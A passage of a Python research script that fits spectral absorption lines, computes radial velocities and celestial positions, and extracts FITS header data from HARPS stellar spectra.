in range(5):\n const_guess = np.mean(flux)\n amplitude_guess = np.min(flux) - const_guess\n mean_guess = line_center0 #*(attempt+1)\n stddev_guess = 0.1\n\n # Fit Gaussian\n ERRORE=0\n try:\n popt_gaussian, pcov = curve_fit(negative_gaussian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERRORE = 1 # flag the failed fit (was misspelled ERORRE, which left ERRORE at 0)\n popt_gaussian = [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n sigma = np.nan # keep the names used downstream defined\n sigma_error = np.nan\n\n if ERRORE == 0:\n y_fit_gaussian = negative_gaussian(wl, *popt_gaussian)\n errors = np.sqrt(np.diag(pcov))\n sigma_error = errors[3]\n sigma=popt_gaussian[3]\n\n # Fit Lorentzian\n ERRORE=0\n try:\n popt_lorentzian, pcov = curve_fit(negative_lorentzian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERRORE = 1 # flag the failed fit (was misspelled ERORRE)\n popt_lorentzian = [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n delta_wl=np.nan\n rv=np.nan\n # NaN defaults so the final return statement stays defined on failure\n reduced_chisq=np.nan\n gamma=np.nan\n skewness=np.nan\n kurtosis=np.nan\n speck=np.nan\n speck_wl=np.nan\n\n if ERRORE == 0:\n y_fit_lorentzian = negative_lorentzian(wl, *popt_lorentzian)\n errors = np.sqrt(np.diag(pcov)) # Extract the errors from the covariance matrix\n \n continuum=popt_lorentzian[0]\n amplitude=popt_lorentzian[1]\n line_center=popt_lorentzian[2]\n gamma=popt_lorentzian[3]\n continuum_error = errors[0]\n amplitude_error = errors[1]\n line_center_error = errors[2]\n gamma_error = errors[3]\n delta_wl=line_center0-popt_lorentzian[2]\n rv = (line_center/line_center0 - 1)*const.c.to(u.km/u.s).value\n mask1 = (wl > (line_center - 2 * gamma)) & (wl < (line_center + 2 * gamma))\n \n # Subset of flux and y_fit\n wl_subset=wl[mask1]\n flux_subset = flux[mask1]/continuum\n y_fit_lorentzian_subset = y_fit_lorentzian[mask1]/continuum\n \n residuals = flux_subset - y_fit_lorentzian_subset\n rms_residuals = np.std(residuals)\n 
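# Fit-quality metrics: SNR is the fitted line depth over the residual RMS;\n # chi^2 uses the sample std of the flux as a per-point sigma (a rough\n # choice), and R^2 compares residual variance to total variance.\n 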
snr=abs(amplitude/continuum)/rms_residuals\n \n chisq = np.sum((residuals / np.std(flux_subset)) ** 2)\n dof = len(wl) - len(popt_lorentzian)\n reduced_chisq = chisq / dof\n ss_res = np.sum(residuals ** 2)\n ss_tot = np.sum((flux_subset - np.mean(flux_subset)) ** 2)\n r_squared = 1 - (ss_res / ss_tot)\n if r_squared<0 :\n print(\"************************************\")\n print(\"************************************\")\n print(\"* W A R N I N G R2<0 \")\n print(\"************************************\")\n print(\"************************************\")\n # break\n \n \n #if ERRORE == 0:\n #print('attempt ',attempt)\n #if attempt==1000:\n # plot=False\n # log=False\n \n flux1=1-flux_subset\n sum_flux = sum(flux1)\n npt_subset = len(flux_subset)\n \n skewness = sum(flux1[i] * (wl_subset[i] - line_center)**3 for i in range(npt_subset)) / (sum_flux * sigma**3)\n kurtosis = sum(flux1[i] * (wl_subset[i] - line_center)**4 for i in range(npt_subset)) / (sum_flux * sigma**4) - 3\n\n #if amplitude>0 and line_center0>line_center-gamma and line_center0 (line_center0 - wl_span)) & (lambda_values < (line_center0 + wl_span)) \n #mask_lines2 = (lambda_values > (line_center0 - wl_span)) & (lambda_values < (line_center0 + wl_span)) & np.isnan(loggf_values)\n #new_wl = wl*(1+rv/const.c.to(u.km/u.s).value)\n #flux_interpolator = interp1d(new_wl, flux, kind='cubic', bounds_error=False, fill_value=0)\n #new_flux = flux_interpolator(wl)\n new_wl = wl*(1-rv/const.c.to(u.km/u.s).value)\n new_flux = flux\n print(\"Radial velocity (km/s):\", rv)\n print(\"Speed of light (km/s):\", const.c.to(u.km/u.s).value)\n print(\"Expected shift in Angstroms:\", 6562 * (rv / const.c.to(u.km/u.s).value))\n print('mean shift in wavelength',np.mean(wl-new_wl),'mean difference in flux',np.mean(flux-new_flux))\n #for w, f, new_w, new_f in zip(wl, flux, new_wl, new_flux):\n # print(w, f, new_w, new_f)\n print()\n num_plot = 1\n if num_plot == 1:\n fig, ax1 = plt.subplots(1, 1)\n manager = plt.get_current_fig_manager()\n manager.window.wm_geometry(\"1400x1200+0+0\")\n original = False\n if original == True:\n ax1.plot(new_wl,new_flux/continuum, color='orange', linestyle ='dashed', label='Data')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n ax1.axvline(line_center , color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center-gamma, color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center+gamma, color='#FF00CC', linestyle='dashed', label='Center')\n else:\n ax1.plot(new_wl,new_flux/continuum, label='Data')\n ax1.plot(new_wl, y_fit_lorentzian/continuum, label='Lorentzian Fit', linestyle='dashed')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n jj=-1\n for lam, elem in zip(lambda_values[mask_lines], elements[mask_lines]):\n jj= jj+1\n ax1.axvline(lam, color = '#bbbbff', linestyle='dotted')\n ax1.text(lam, ax1.get_ylim()[0]+0.0001*jj, elem, rotation=45, va='bottom')\n #for lam, elem in zip(lambda_values[mask_lines2], elements[mask_lines2]):\n # ax1.axvline(lam, linestyle='dotted')\n # ax1.text(lam, ax1.get_ylim()[0], elem, rotation=45, va='bottom')\n ax1.set_xlim(x1, x2)\n ax1.set_ylabel('Flux')\n ax1.grid(True)\n plt.tight_layout()\n plt.show()\n elif num_plot == 2:\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, gridspec_kw={'height_ratios': [3, 1]})\n manager = plt.get_current_fig_manager()\n manager.window.wm_geometry(\"1800x600+0+0\")\n original = False\n if original == True:\n ax1.plot(new_wl,new_flux/continuum, 
color='orange', linestyle ='dashed', label='Data')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n ax1.axvline(line_center , color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center-gamma, color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center+gamma, color='#FF00CC', linestyle='dashed', label='Center')\n else:\n # ax1.plot(wl,flux/continuum, color ='#fdfdfd', label='Data')\n ax1.plot(new_wl,new_flux/continuum, label='Data')\n ax1.plot(new_wl, y_fit_lorentzian/continuum, label='Lorentzian Fit', linestyle='dashed')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n for lam, elem in zip(lambda_values[mask_lines], elements[mask_lines]):\n ax1.axvline(lam, color='#00e000', linestyle='dotted')\n ax1.text(lam, ax1.get_ylim()[0], elem, rotation=45, va='top', color='#00a000')\n for lam, elem in zip(lambda_values[mask_lines2], elements[mask_lines2]):\n ax1.axvline(lam, color='#d000b0', linestyle='dotted')\n ax1.text(lam, ax1.get_ylim()[0], elem, rotation=45, va='bottom', color='#8000b0')\n ax1.set_xlim(x1, x2)\n ax1.set_ylabel('Flux')\n #ax1.set_title('H-alpha Line')\n ax1.grid(True)\n #ax1.legend()\n ax2.plot(new_wl, (flux - y_fit_lorentzian)/continuum, label='Residuals')\n ax2.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n #ax2.axvline(line_center-gamma, color='red', linestyle='dashed', label='Center')\n #ax2.axvline(line_center+gamma, color='red', linestyle='dashed', label='Center')\n for lam, elem in zip(lambda_values[mask_lines], elements[mask_lines]):\n ax2.axvline(lam, color='#000080', linestyle='dotted')\n ax2.set_xlim(x1, x2)\n ax2.set_xlabel('Wavelength [AA]')\n ax2.set_ylabel('Residuals')\n ax2.grid(True)\n plt.tight_layout()\n plt.show()\n else:\n figatomare = True\n \n new_wl = wl*(1-rv/const.c.to(u.km/u.s).value)\n new_flux = flux\n speck=new_flux/continuum\n speck_wl=new_wl\n else:\n figatomare = True\n\n return rv,reduced_chisq,gamma,skewness,kurtosis,speck,speck_wl\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef true_azimuth(angle):\n # convert ESO azimuth convention to astronomical definition of azimuth\n # till 2006.75 ESO used azimuth ranging from 180 to 540 clockwise (N=180, E=270, S=360, W=450)\n # from 2006.75 ESO used azimuth ranging from 0 to 360 clockwise (N=180, E=270, S= 0, W= 90)\n # the correction below (N=0, E=90, S=180, W=270)\n true_azimuth_angle = (angle + 180) % 360\n return true_azimuth_angle\n# ------------------------------ END FUNCTION ------------------------------ #\n\n \n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef convert_from_pseudosexagesimal_to_degrees(hhmmss, ddmmss):\n# Example\n#hhmmss = 123456.43234\n#ddmmss = -1234.5678\n#(hhmmss_str, hhmmss_deg), (ddmmss_str, ddmmss_deg) = convert_to_sexagesimal_and_degrees(hhmmss, ddmmss)\n#print(f\"HHMMSS Sexagesimal Representation: {hhmmss_str}\") \n#print(f\"HHMMSS Degrees: {hhmmss_deg}\")\n#print(f\"DDMMSS Sexagesimal Representation: {ddmmss_str}\") \n#print(f\"DDMMSS Degrees: {ddmmss_deg}\")\n\n # Function to convert a single part\n def convert_part(number, is_degrees=False):\n # Separating the integer and fractional parts\n integer_part = int(abs(number))\n fractional_part = abs(number) - integer_part\n\n # Converting integer part\n hours_or_degrees = integer_part // 10000\n minutes = (integer_part // 100) % 
100\n seconds = integer_part % 100 + fractional_part\n \n # Forming the sexagesimal string representation\n sexagesimal_str = f\"{int(hours_or_degrees):02d}:{int(minutes):02d}:{seconds:02f}\".rstrip('0').rstrip('.')\n if number < 0 and is_degrees:\n sexagesimal_str = '-' + sexagesimal_str\n \n # Convert to degrees\n total_seconds = hours_or_degrees * 3600 + minutes * 60 + seconds\n if is_degrees:\n degrees = total_seconds / 3600\n if number < 0:\n degrees = -degrees\n else:\n degrees = total_seconds * 15 / 3600\n \n return sexagesimal_str, degrees\n \n # Convert hh:mm:ss.xs\n sexagesimal_hhmmss, degrees_hhmmss = convert_part(hhmmss)\n \n # Convert dd:mm:ss.xs\n sexagesimal_ddmmss, degrees_ddmmss = convert_part(ddmmss, True)\n \n return degrees_hhmmss, degrees_ddmmss, sexagesimal_hhmmss, sexagesimal_ddmmss\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef testfilefits(myfile):\n if os.path.exists(myfile) and os.path.getsize(myfile) > 0:\n with open(myfile, 'rb') as f:\n first_line = f.read(6) # read the first 6 characters\n if first_line.startswith(b'SIMPLE'):\n isfits = True\n else:\n print(f'{myfile} is_not_a_valid_FITS_file')\n isfits = False\n else:\n print(f'ERR {myfile.replace(\"/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data/\",\"\")} not_found_or_empty')\n isfits = False\n return isfits\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef calculate_star_altaz(ra, dec, geolon, geolat, elevation, mjd, humidity=None, temperature=None, pressure=None):\n star_coords = SkyCoord(ra=ra * u.deg, dec=dec * u.deg)\n obs_location = EarthLocation(lon=geolon * u.deg, lat=geolat * u.deg, height=elevation * u.m)\n obs_time = Time(mjd, format='mjd')\n altaz_frame = AltAz(obstime=obs_time, location=obs_location)\n\n star_altaz = star_coords.transform_to(altaz_frame)\n star_azimuth0 = star_altaz.az\n star_altitude0 = star_altaz.alt\n\n altaz_frame_with_atmosphere = AltAz(obstime=obs_time, location=obs_location, obswl=550 * u.nm,temperature=temperature * u.deg_C, pressure=pressure * u.mbar, relative_humidity=humidity)\n star_altaz = star_coords.transform_to(altaz_frame_with_atmosphere)\n star_azimuth = star_altaz.az\n star_altitude = star_altaz.alt\n\n return star_azimuth, star_altitude, star_azimuth0, star_altitude0\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef calculate_sun_position(mjd, lon, lat, elevation):\n location = EarthLocation(lon=lon*u.deg, lat=lat*u.deg, height=elevation*u.m)\n time = Time(mjd, format='mjd')\n\n sun_altaz = get_sun(time).transform_to(AltAz(obstime=time, location=location))\n sun_ra_dec = get_sun(time).transform_to('icrs')\n\n sun_altitude = sun_altaz.alt\n sun_azimuth = sun_altaz.az\n\n return sun_ra_dec.ra, sun_ra_dec.dec, sun_altitude, sun_azimuth\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef calculate_moon_position(mjd, lon, lat, elevation):\n location = EarthLocation(lon=lon*u.deg, lat=lat*u.deg, height=elevation*u.m)\n time = Time(mjd, format='mjd')\n\n moon_altaz = get_moon(time).transform_to(AltAz(obstime=time, location=location))\n moon_ra_dec = 
get_moon(time).transform_to('icrs')\n\n    moon_altitude = moon_altaz.alt\n moon_azimuth = moon_altaz.az\n\n return moon_ra_dec.ra, moon_ra_dec.dec, moon_altitude, moon_azimuth\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_lowpass(cutoff, nyq_freq, order=4):\n normal_cutoff = float(cutoff) / nyq_freq\n b, a = signal.butter(order, normal_cutoff, btype='lowpass')\n return b, a\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_lowpass_filter(data, cutoff_freq, nyq_freq, order=4):\n b, a = butter_lowpass(cutoff_freq, nyq_freq, order=order)\n y = signal.filtfilt(b, a, data)\n return y\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_highpass(cutoff, nyq_freq, order=4):\n normal_cutoff = float(cutoff) / nyq_freq\n b, a = signal.butter(order, normal_cutoff, btype='highpass')\n return b, a\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_highpass_filter(data, cutoff_freq, nyq_freq, order=4):\n b, a = butter_highpass(cutoff_freq, nyq_freq, order=order)\n y = signal.filtfilt(b, a, data)\n return y\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef statistics(y):\n max_y = np.nanmax(y)\n min_y = np.nanmin(y)\n sum_y = np.nansum(y)\n mean_y = np.nanmean(y)\n median_y = np.nanmedian(y)\n rms_y = np.nanstd(y, ddof=1)\n skew_y = stats.skew(y / max(y), nan_policy='omit')\n kurt_y = stats.kurtosis(y / max(y), nan_policy='omit')\n return max_y, min_y, sum_y, mean_y, median_y, rms_y, skew_y, kurt_y\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef process_spectrum(flux, wl, j1, j2):\n x = flux[0][j1:j2]\n wl_part = wl[0][j1:j2]\n max_value, min_value, sum_value, mean_value, median_value, rms_value, skew_value, kurt_value = statistics(x)\n coarse_resolution = 100.0 # Angstrom\n nnn = int(round((wl_part[-1] - wl_part[0]) / coarse_resolution))\n nwl = np.linspace(wl_part[0], wl_part[-1], nnn)\n spectrum_LR = np.zeros_like(nwl)\n for i in range(nnn):\n start_idx = np.searchsorted(wl_part, nwl[i] - coarse_resolution / 2)\n end_idx = np.searchsorted(wl_part, nwl[i] + coarse_resolution / 2)\n spectrum_LR[i] = np.sum(x[start_idx:end_idx]) / (end_idx - start_idx)\n f = interpolate.interp1d(nwl, spectrum_LR, kind='linear')\n spectrum_envelope = f(wl_part)\n spectrum_flat_0 = x / spectrum_envelope\n spec_median = np.nanmedian(spectrum_flat_0)\n spectrum_flat = spectrum_flat_0 / spec_median\n # Unpack the maximum into max_f (the original re-used rms_f twice, which\n # silently dropped the maximum of the flattened spectrum)\n max_f, min_f, sum_f, mean_f, median_f, rms_f, skew_f, kurt_f = statistics(spectrum_flat)\n return max_value, min_value, sum_value, mean_value, median_value, rms_value, skew_value, kurt_value, max_f, min_f, sum_f, mean_f, median_f, rms_f, skew_f, kurt_f\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef process_file(file_list, file_type, datakw):\n spectral_masks = [\"G2\", \"K0\", 
\"K5\", \"M2\", \"M4\"]\n file_data = {}\n for keyword in datakw[file_type]['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n for mask in spectral_masks:\n file_data[f'{column_name}_{mask}_{file_type}'] = None\n filefits = next((f for f in file_list if f\"_{file_type}_\" in f), None)\n if filefits:\n isfits = testfilefits(filefits)\n if isfits == True:\n hdu=fits.open(filefits, ignore_missing_end=True)\n #print(f'{file_type} {filefits.replace(\"/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data/\",\"\")}')\n hdr0 = hdu[0].header\n for keyword in datakw[file_type]['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n for mask in spectral_masks:\n if mask in filefits:\n try:\n keyword_value = hdr0.get(keyword, None)\n keyword_comment = hdr0.comments[keyword]\n file_data[f'{column_name}_{mask}_{file_type}'] = {'value': keyword_value,'comment': keyword_comment}\n except KeyError:\n continue\n hdu.close()\n return file_data\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef process_gui_file(gui_files, datakw):\n gui_data = {}\n\n # Initialize gui_data dictionary\n for keyword in datakw['gui']['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n gui_data[column_name] = {'value': None, 'comment': None}\n\n # If gui_files is not empty\n if gui_files:\n gui_file = gui_files[0]\n isfits = testfilefits(gui_file)\n if isfits:\n # Open the file\n with fits.open(gui_file) as harps_list_obs:\n hdr0 = harps_list_obs[0].header\n # Loop through the keywords\n for keyword in datakw['gui']['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n try:\n # Try to access the keyword\n keyword_value = hdr0.get(keyword, None)\n keyword_comment = hdr0.comments[keyword]\n gui_data[column_name] = {'value': keyword_value, 'comment': keyword_comment}\n except KeyError:\n # Keyword not found, skip to the next one\n print(f\"Keyword '{keyword}' not found, skipping.\")\n continue\n\n return gui_data\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n\n#********************************************************************************\n#\n# CONFIGURATION\n#\n#********************************************************************************\n\n\n# Location to store the downloaded files\nstorage_path = '/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data'\ncache_path = os.path.join(storage_path, '.cache')\nexec_path = '/home/mbarbier/mylocal/harpsrvcatalog/output'\n\n\n# Minimum and maximum usable wavelengths in the blue and red CCDs in Angstrom\nwl_min_b = 3783.0\nwl_max_b = 5304.0\nbw_b = wl_max_b - wl_min_b # 1521.0\nwl_min_r = 5338.0\nwl_max_r = 6912.0\nbw_r = wl_max_r - wl_min_r # 1574.0\n\nfile_names = ['adp', 'ccf', 'bis', 'gui']\nbase_filename = '{}_small.hdr'\nspectral_masks = [\"G2\", \"K0\", \"K5\", \"M2\", \"M4\"]\n\n\n#\nstellar_templates = pd.read_csv(\"list.phoenix_stellar_templates.csv\")\nw1 = 3781.05\nw2 = 6913.87\ntpl_wl = np.arange(w1, w2, 0.01)\nfor index, row in stellar_templates.iterrows():\n spt = row['spt']\n template_file = row['template_file']\n \n with fits.open(template_file) as harps_list_obs:\n spectpl = harps_list_obs[1].data\n tpl_wl_vacuum = spectpl.field('WAVE')\n tpl_wl_air = convert_to_air_wavelengths(tpl_wl_vacuum)\n 
flux = spectpl.field('FLUX')\n interpolated_flux = np.interp(tpl_wl, tpl_wl_air, flux)\n if 'M0' in spt:\n tpl_M = interpolated_flux\n if 'K2' in spt:\n tpl_K = interpolated_flux\n if 'G2' in spt:\n tpl_G = interpolated_flux\n if 'F5' in spt:\n tpl_F = interpolated_flux\n if 'A5' in spt:\n tpl_A = interpolated_flux\n if 'B8' in spt:\n tpl_B = interpolated_flux\ntemplates_spectra = [tpl_M, tpl_K, tpl_G, tpl_F, tpl_A, tpl_B]\n\n\n\n#\n\n#with fits.open('spectral_line_list_coluzzi_harps.fits') as absorption_lines:\n# absorption_lines_data = absorption_lines[1].data\n\nwith fits.open('nist_lines_output.fits') as absorption_lines:\n absorption_lines_data = absorption_lines[1].data\n \n\n\n# Dictionary to store keywords and comments for different file types\ndatakw = {}\n\n# Loop through each file type\nfor file_type in file_names:\n # Lists to store the keyword names and comments for the current file type\n keywords_list = []\n comments_list = []\n # Read the file line by line\n with open(base_filename.format(file_type), 'r') as f:\n for line in f:\n # Split the line based on '=' character\n keyword_part, value_comment_part = line.split('=', 1)\n # Strip whitespaces from keyword name and add to the list\n keywords_list.append(keyword_part.strip())\n # Split the second part based on '/' character to separate the value and comment\n value_part, comment_part = value_comment_part.split('/', 1)\n # Strip whitespaces from comment and add to the list\n comments_list.append(comment_part.strip())\n # Store the lists in the dictionary for the current file type\n datakw[file_type] = {'keywords': keywords_list, 'comments': comments_list}\n\n# Open the FITS file\nwith fits.open('harps_simbad_crossmatch_nearest.fits') as harps_list_obs:\n harps_list_obs_data = harps_list_obs[1].data\n indices = np.arange(len(harps_list_obs_data))\n # Shuffle the indices\n np.random.shuffle(indices)\n # Use the shuffled indices to access the rows in random order\n shuffled_harps_list_obs_data = harps_list_obs_data[indices]\n\n#print('begin masking')\n\n#mask_spt = [not row['spt_obj'].startswith(('O','B','A','F', 'G', 'K', 'M', 'N', '-')) for row in shuffled_harps_list_obs_data]\n#mask_spt = [row['spt_obj'].startswith(('C','W','Q','R', 'S', '?')) for row in shuffled_harps_list_obs_data]\n#mask_acen = [(row['ra']>219.84) & (row['ra']<219.9) & (row['dec']<-60.826) & (row['dec']>-60.844) for row in harps_list_obs_data]\n#mask_bethyi= [(row['ra']>6.34) & (row['ra']<6.48) & (row['dec']>-77.265) & (row['dec']<-77.245) for row in harps_list_obs_data]\n#mask_pole= [(row['dec']>-70) & (row['dec']<-90) for row in harps_list_obs_data]\n#mask=mask_acen\n#mask=mask_bethyi\n#mask=mask_pole\n\n## Apply the mask to select only the rows that meet the conditions\n#selected_rows = [row for row, m in zip(harps_list_obs_data, mask) if m]\n#selected_rows = [row for row, m in zip(shuffled_harps_list_obs_data, mask) if m]\n## Sort the selected_rows by 'mjd_obs' in descending order\n#selected_rows = sorted(selected_rows, key=lambda x: x['mjd_obs'], reverse=False)\n\n#print(len(selected_rows))\n#for row in selected_rows:\n# print(row['spt_obj'])\n \n#print('end masking')\n#sys.exit()\nk = 0\nspeck = None\n#speck_wl = None\n# Loop over all rows\n\n#for row in harps_list_obs_data:\n#\n#for row in selected_rows:\n#\nfor row in shuffled_harps_list_obs_data:\n k += 1\n #print()\n #if(k>1000):\n # sys.exit()\n dp_id_raw = row['dp_id_raw']\n archive_id_spectra0 = row['archive_id_spectra'].strip()\n archive_id_ancillary0 = 
row['archive_id_ancillary'].strip()\n\n if len(archive_id_spectra0) > 0:\n archive_id_spectra = archive_id_spectra0 + '.fits'\n dateobs = dp_id_raw[6:16]\n spectra_file = os.path.join(storage_path, dateobs, archive_id_spectra)\n all_results = {}\n #adp_data = {}\n #for keyword in datakw['adp']['keywords']:\n # column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n # adp_data[column_name] = {'value': None,'comment': None}\n #adp_data['tel_targ_delta_epoch'] = {'value': None,'comment': None}\n #adp_data['tel_targ_alpha_epoch'] = {'value': None,'comment': None}\n #adp_data['mjd-obs_center'] = {'value': None,'comment': None}\n #adp_data['diff_ra_ep_pnt'] = {'value': None,'comment': None}\n #adp_data['diff_de_ep_pnt'] = {'value': None,'comment': None}\n #adp_data['diff_ra_ob_pnt'] = {'value': None,'comment': None}\n #adp_data['diff_de_ob_pnt'] = {'value': None,'comment': None}\n #adp_data['num_pmra'] = {'value': None,'comment': None}\n #adp_data['num_pmde'] = {'value': None,'comment': None}\n isfits = testfilefits(spectra_file)\n if isfits == True:\n harps_list_obs = fits.open(spectra_file)\n #print(f'adp {spectra_file.replace(\"/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data/\",\"\")}')\n hdr0 = harps_list_obs[0].header\n hdr1 = harps_list_obs[1].header\n spec = harps_list_obs[1].data\n adp_data = {}\n keywords = datakw['adp']['keywords']\n for keyword in keywords:\n keyword_value = hdr0.get(keyword, None)\n keyword_comment = hdr0.comments[keyword]\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n adp_data[column_name] = {'value': keyword_value,'comment': keyword_comment}\n #print(adp_data[column_name])\n adp_data['tel_targ_delta_epoch'] = {'value': None,'comment': None}\n adp_data['tel_targ_alpha_epoch'] = {'value': None,'comment': None}\n adp_data['mjd-obs_center'] = {'value': None,'comment': None}\n adp_data['diff_ra_ep_pnt'] = {'value': None,'comment': None}\n adp_data['diff_de_ep_pnt'] = {'value': None,'comment': None}\n adp_data['diff_ra_ob_pnt'] = {'value': None,'comment': None}\n adp_data['diff_de_ob_pnt'] = {'value': None,'comment': None}\n adp_data['num_pmra'] = {'value': None,'comment': None}\n adp_data['num_pmde'] = {'value': None,'comment': None}\n \n #adp_data[''] = {'value': None,'comment': None}\n #print(adp_data['tel_targ_alpha']['value'],adp_data['tel_targ_delta']['value'])\n tel_targ_alpha_degrees, tel_targ_delta_degrees, tel_targ_alpha_sexag, tel_targ_delta_sexag = convert_from_pseudosexagesimal_to_degrees(adp_data['tel_targ_alpha']['value'],adp_data['tel_targ_delta']['value'])\n adp_data['tel_targ_alpha']['value'] = tel_targ_alpha_degrees\n adp_data['tel_targ_delta']['value'] = tel_targ_delta_degrees\n\n ra1 , de1, _ , _ = convert_from_pseudosexagesimal_to_degrees(adp_data['ins_adc1_ra']['value'],adp_data['ins_adc1_dec']['value'])\n adp_data['ins_adc1_ra']['value'] = ra1\n adp_data['ins_adc1_dec']['value'] = de1\n\n ra2 , de2, _ , _ = convert_from_pseudosexagesimal_to_degrees(adp_data['ins_adc2_ra']['value'],adp_data['ins_adc2_dec']['value'])\n adp_data['ins_adc2_ra']['value'] = ra2\n adp_data['ins_adc2_dec']['value'] = de2\n \n #j2000=51544.5\n pmra=adp_data['tel_targ_pma']['value']\n pmde=adp_data['tel_targ_pmd']['value']\n mjd=adp_data['mjd-obs']['value']\n tel_targ_alpha_epoch = tel_targ_alpha_degrees + pmra/3600*(mjd-51544.5)/365.25\n tel_targ_delta_epoch = tel_targ_delta_degrees + pmde/3600*(mjd-51544.5)/365.25\n adp_data['tel_targ_alpha_epoch']['value'] = 
tel_targ_alpha_epoch\n adp_data['tel_targ_delta_epoch']['value'] = tel_targ_delta_epoch\n pm_tot_ob = np.sqrt(pmra**2+pmde**2)\n adp_data['mjd-obs_center']['value']=mjd+adp_data['exptime']['value']*adp_data['ins_det1_tmmean']['value']\n diff_ra_ep_pnt = (adp_data['tel_targ_alpha_epoch']['value']-adp_data['ra']['value'])*3600*np.cos(adp_data['tel_targ_delta']['value']*np.pi/180)\n diff_de_ep_pnt = (adp_data['tel_targ_delta_epoch']['value']-adp_data['dec']['value'])*3600\n diff_ra_ob_pnt = (adp_data['tel_targ_alpha']['value']-adp_data['ra']['value'])*3600*np.cos(adp_data['tel_targ_delta']['value']*np.pi/180)\n diff_de_ob_pnt = (adp_data['tel_targ_delta']['value']-adp_data['dec']['value'])*3600\n #num_pmra = diff_ra_ep_pnt/(pmra*(mjd-51544.5)/365.25)\n #num_pmde = diff_de_ep_pnt/(pmde*(mjd-51544.5)/365.25)\n lon=adp_data['tel_geolon']['value']\n lat=adp_data['tel_geolat']['value']\n ele=adp_data['tel_geoelev']['value']\n humidity=adp_data['tel_ambi_rhum']['value']\n temperature=adp_data['tel_ambi_temp']['value']\n pressure=adp_data['tel_ambi_pres_start']['value']\n true_azimuth_angle = true_azimuth(adp_data['tel_az']['value'])\n adp_data['tel_az']['value'] = true_azimuth_angle\n\n sun_ra , sun_dec , sun_alt , sun_az = calculate_sun_position(mjd, lon, lat, ele)\n moon_ra, moon_dec, moon_alt, moon_az = calculate_moon_position(mjd, lon, lat, ele)\n sun_coord = SkyCoord(ra=sun_ra, dec=sun_dec, frame='icrs')\n moon_coord = SkyCoord(ra=moon_ra, dec=moon_dec, frame='icrs')\n object_coord = SkyCoord(ra=tel_targ_alpha_epoch*u.deg, dec=tel_targ_delta_epoch*u.deg, frame='icrs')\n \n angular_distance_obj_sun = object_coord.separation(sun_coord)\n angular_distance_obj_moon = object_coord.separation(moon_coord)\n \n #print(angular_distance_obj_sun.deg,angular_distance_obj_moon.deg,sun_alt.deg)\n\n azimuth, altitude, azimuth0, altitude0 = calculate_star_altaz(tel_targ_alpha_epoch, tel_targ_delta_epoch, lon, lat, ele, mjd, humidity, temperature, pressure)\n diff_az = (azimuth.deg-adp_data['tel_az']['value'])*3600*np.cos(altitude*np.pi/180)\n diff_alt = (altitude.deg-adp_data['tel_alt']['value'])*3600\n\n\n all_results.update(adp_data)\n wl = spec.field('WAVE')\n flux = spec.field('FLUX')\n wl_ = spec.field('WAVE').flatten()\n flux_ = spec.field('FLUX').flatten()\n npoints = flux.size\n \n #print(adp_data['object']['value'])\n # Tecnezio\n #popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4238.19,3.0)\n #popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4262.27,3.0)\n 